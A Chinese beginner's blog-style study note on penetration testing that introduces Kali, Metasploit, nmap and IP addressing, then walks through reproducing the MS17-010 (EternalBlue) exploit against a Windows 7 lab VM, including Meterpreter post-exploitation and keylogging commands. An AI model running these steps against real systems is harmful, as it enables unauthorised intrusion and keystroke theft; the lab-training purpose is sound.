小白的新手学习笔记——第三篇

一、渗透

1.应该怎样学习呢?

可以从以下几个方面:
1.关注并观看一些安全网站与公众号
2.尽量保持每天看几篇相关文章,增加自己对于漏洞知识的储备量
3.多多利用好浏览器这个强大的搜索工具,不懂就多问
4.最好可以养成做笔记的习惯,将自己的知识理清相连做成思维导图
5.就是多多动手实践,只有实践出真知,才能发现新的知识

2.学习的工具推荐

1.幕布

如果是写学习笔记亦或者做思维导图幕布是一个很好的选择。当然如果你有更好的也行。

2.kali

kali是基于Debian的Linux发行版,设计用于数字取证和渗透测试的操作系统预装了许多渗透测试软件,包括nmap(端口扫描器)、Wireshark(数据包分析器)、John the Ripper(密码破解器),以及Aircrack-ng(应用于对无线局域网进行渗透测试的软件)。

简单来说就是一个工具的集成器,基本上所需要的工具它里面都有,通常都是作为攻击机所使用。

3.VM ware

简单一点就是“实验室”,在本体机上虚拟多个虚拟机用于配置模拟,实现对渗透攻击的实践与测试。同样有更好的也行。

3.相关知识

1.什么是IP地址?

IP地址可以看成在电脑世界里每台电脑的“身份证”,是在网络海中找到你的基本依据。

IP地址分ipv4和ipv6,我们现在只需要知道ipv4的IP地址划分:

A类/A段:0.0.0.0~127.255.255.255

B类/B段:128.0.0.0~191.255.255.255

C类/C段:192.0.0.0~223.255.255.255

D类/D段:224.0.0.0~239.255.255.255

E类/E段:240.0.0.0~255.255.255.255

A类、B类、C类都用于分配给主机使用;
D类用于组播,什么是组播?现在还不需要知道
E类作用于研究。

2.什么是网络掩码?

网络掩码,也称为子网掩码,是用来指明一个IP地址的哪些位标识的是主机所在的子网,以及哪些位标识的是主机的位掩码。 它是一个32位的地址,用于屏蔽IP地址的一部分以区别网络标识和主机标识,从而说明该IP地址是在局域网上,还是在广域网上。子网掩码不能单独存在,必须结合IP地址一起使用。

只需要知道,子网掩码并不能单独使用,必须需要结合IP地址一起使用。子网掩码是用来区分或者说是划分网络地址和主机地址,用于确定网络范围的。

3.Metasploit

Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。

4.nmap

Nmap 全称为 NetworkMapper
Nmap是目前最流行的网络扫描工具,不仅能准确探测单台主机的详细情况,而且能高效地对大范围的Ip地址段扫描。能扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至知道网络中使用了何种类型的防火墙设备等。

来点动手实践,不然光看知识点有点太枯燥,就用经常被提及的ms17-010永恒之蓝漏洞吧

4.实验室测试(ms17-010漏洞复现)

1.准备阶段

确定漏洞复现目标:MS17-010(微软17年公布的第10个漏洞,亦称“永恒之蓝”,适用于Windows 8版本以下)
使用软件:VMware
攻击机:kali
靶场环境:Windows 7

2.搭建靶机环境

Windows 7和kali都统一用NAT模式:

确认kali和Windows 7处于同网段下:
kali用root账号登录:

(我这里的kali是改为中文设置的)


打开终端并输入ipconfig查看IP地址:

可以看见kali的IP地址:
IP地址:192.168.11.129
netmask(子网掩码):255.255.255.0

Windows 7:

Windows+R键打开运行,输入cmd进入命令行:

输入ipconfig,查看IP地址:

ipconfig

可以看见Windows 7的IP地址:
IP:192.168.11.128
子网掩码:255.255.255.0

关闭防火墙:

3.环境搭建完成:

NAT模式
kali:192.168.11.129
win7:192.168.11.128

4.工具准备:

Nmap、metasploit框架,这些都在kali中。

5.开始漏洞复现:

1.nmap扫描阶段:
nmap -sS 192.168.11.128

可以看见端口445是开放(open)的,那么就可以开始尝试ms17-010漏洞

进入msfconsole:
msfconsole


进入这个界面就算成功。
搜索ms17-010:search ms17-010

exploit(攻击模块)、auxiliary(辅助模块)

先用auxiliary探测一下是否存在ms17-010漏洞:
use 3
show options

在required下为yes的是必要参数
可以看见RHOSTS处为空,所以设置RHOSTS为目标主机IP
set rhosts 192.168.11.128
确认好必要参数都设置了,就开始run

这就说明存在可以使用ms17-010!

2.攻击阶段:




一样缺少RHOSTS参数,设置好RHOSTS:

确定好就可以:run

这就代表已经成功攻击目标机,
接下来就是后渗透方面知识:

3.后渗透阶段:

shell        相当于Windows的cmd命令行模式


chcp 65001        将编码改为UTF-8


sysinfo        查看目标系统信息

getuid        查看目标用户身份

screenshot        对目标当前屏幕进行截图

ps        查看进程

migrate -P 7448        监听目标
keyscan_start        开启键盘监听
keyscan_dump        获取监听
keyscan_stop        停止监听


可以看见目标刚才在cmd命令行输入的代码“whoami”“ipconfig”,其中“[^H]”是删除键,<CR>是确认键

OK,到此,漏洞复现成功,解决方法也非常简单

4.解决方法:
  • 开启防火墙
  • 将445端口拉入防火墙拦截
以上实验若有缺陷或误区请在评论区纠正,同样以上言论仅个人理解,仅供学习参考!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值